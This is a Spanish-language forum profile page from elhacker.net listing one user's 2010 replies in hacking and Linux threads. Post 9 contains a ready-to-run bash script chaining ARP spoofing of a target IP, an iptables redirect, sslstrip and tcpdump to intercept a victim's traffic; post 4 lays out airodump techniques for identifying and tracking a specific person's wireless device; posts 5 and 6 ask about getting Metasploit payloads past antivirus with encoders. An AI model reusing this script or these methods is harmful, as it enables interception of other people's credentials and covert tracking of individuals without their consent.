elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Hacking / Re: [Metasploit] JAVA_basicservice (Videotuto by Metasploiter) en: 14 Diciembre 2010, 12:56 pm
Muy interesante el video.
2  Seguridad Informática / Hacking / Re: Problema con back track 4 en: 11 Diciembre 2010, 10:20 am
Para poder arrancar en vesa con back track, con cualquier tarjeta grafica que de problemas puedes lanzar fixvesa antes de lanzar startx.
Esto te cambia la configuracion del xorg para que funcione en vesa.

Saludos
3  Sistemas Operativos / GNU/Linux / Re: Cuanto espacio necesito para instalar un S.O Linux en: 11 Diciembre 2010, 02:44 am
Si es tu primer acercamiento a linux te recomiendo que utilizes una maquina virtual, o que lo instales en un USB (con uno de 8 GBytes) puedes hacer una instalacion bastante funcional.
4  Seguridad Informática / Hacking / Re: [Práctica] Ataque a ciegas. en: 11 Diciembre 2010, 02:42 am
Para poder identificar al AP que se conecta un equipo te recomiendo lo siguiente:
1-Cuando haces una airodump, en el listado de stations hay una columna llamada probes que es el listado de aps a las que ese station se intenta conectar de manera automatica, lo mismo con un poco de suerte, aparece alguna que logre identificarle (como un AP con el nombre de su trabajo, la de un hotel, etc.). Una vez que identifiques el station solo tienes que ver a que bssid se ha conectado.
2-Si no hay suerte puedes utilizar la tecnica de la doble ubicacion: Haz un listado de todos los stations que se encuentran conectados en tu casa, teniendo la certeza que tu objetivo esta conectado o al menos tiene el wifi encendido. Puedes sacar esa info de csv que genera el airodump. Luego necesitas una segunda ubicacion donde sapas que tu objetivo este conectado o que al menos tengo el wifi encendido. Luego macheas un listado contra otro y el que coincida es muy muy problable que sea tu objetivo (ten cuidao ya que si haces el airodump con el mismo equipo tu mac tambien coincidira en las dos ubicaciones ;)
3-La tecnica que han comentado de fabricante de mac tambien es muy interesante, la puedes aplicar sobre los datos del los stations del aerodump.
4-Otra opcion es, airodump cuando no este en la zona y capturas stations, luego cuando llegue nuevo airodump, y descartas todos los stations del primer escaneo del segundo, lo que queden es posible que sea tu objetivo. Si lo haces varios dias, al final seguro que lo identificas.

Si se me ocurre algo mas ya lo pondre.

Saludos y suerte.

5  Seguridad Informática / Hacking / Re: [Metasploit] Generando Ejecutable con PAYLOAD en: 18 Abril 2010, 22:28 pm
Gracias por la rápida respuesta.

Me pongo a mirar lo de los encoders!!! Recomiendas alguno??
6  Seguridad Informática / Hacking / Re: [Metasploit] Generando Ejecutable con PAYLOAD en: 18 Abril 2010, 22:14 pm
Detectan los antivirus de windows el payload del ejecutable?
7  Seguridad Informática / Hacking / Re: Linux BackTrack 4 en: 16 Abril 2010, 12:29 pm
A mi la verdad es que no me gusta demasiado BackTrack. Prefiero manajer y conocer muy bien las 6 o 7 aplicaciones claves, que mal las 80.000 que trae el BackTrack.

Que trabajo da instalar el nmap, ettercap, wireshark, metasploit, aircrack-ng, dsniff,  nessus, tal vez 15 minutos? Mejor conocer una pocas pero  muy bien, que perderse en la cantidad ingente de aplicaciones del BackTrack.

8  Seguridad Informática / Hacking / Re: HOW TO: Sniffing en Linux (Ettercap+SSLstrip+Driftnet) en: 15 Abril 2010, 16:38 pm
Interesante el Driftnet desconocia su existencia.

Gracias.
9  Seguridad Informática / Hacking / Re: Ettercap+Sslstrip en: 15 Abril 2010, 16:35 pm
Te dejo un script que a mi me funciona a la perfeccion en cuanto a funcionamiento de sslstrip:

#!/bin/bash

path_dir=/tmp #La ruta donde quieras guardar los resultados
file_name=sslstrip.log
file_name2=tcpdump.pcap
device=wlan0 #Modifica según el dispositivo desde donde hagas la captura.
$direccion_ip=192.168.0.12 #La IP del objetivo
$gateway=192.168.0.1 #La IP para realizar el ARP Spoofing

   echo "1" > /proc/sys/net/ipv4/ip_forward
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5555
   roxterm --tab -e sslstrip -w $path_dir/$file_name -l 5555
   roxterm --tab -e arpspoof -i $device -t $direccion_ip $gateway
   roxterm --tab -e tcpdump -nni $device -s 0 -w $path_dir/$file_name2 host $direccion_ip

Espero que te sea de utilidad
10  Seguridad Informática / Hacking / Re: [HOW TO] Ataque Modelo II, de excursión en la red en: 10 Abril 2010, 23:16 pm
Muy muy bueno. Tus 2 papers son impresionantes ..
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines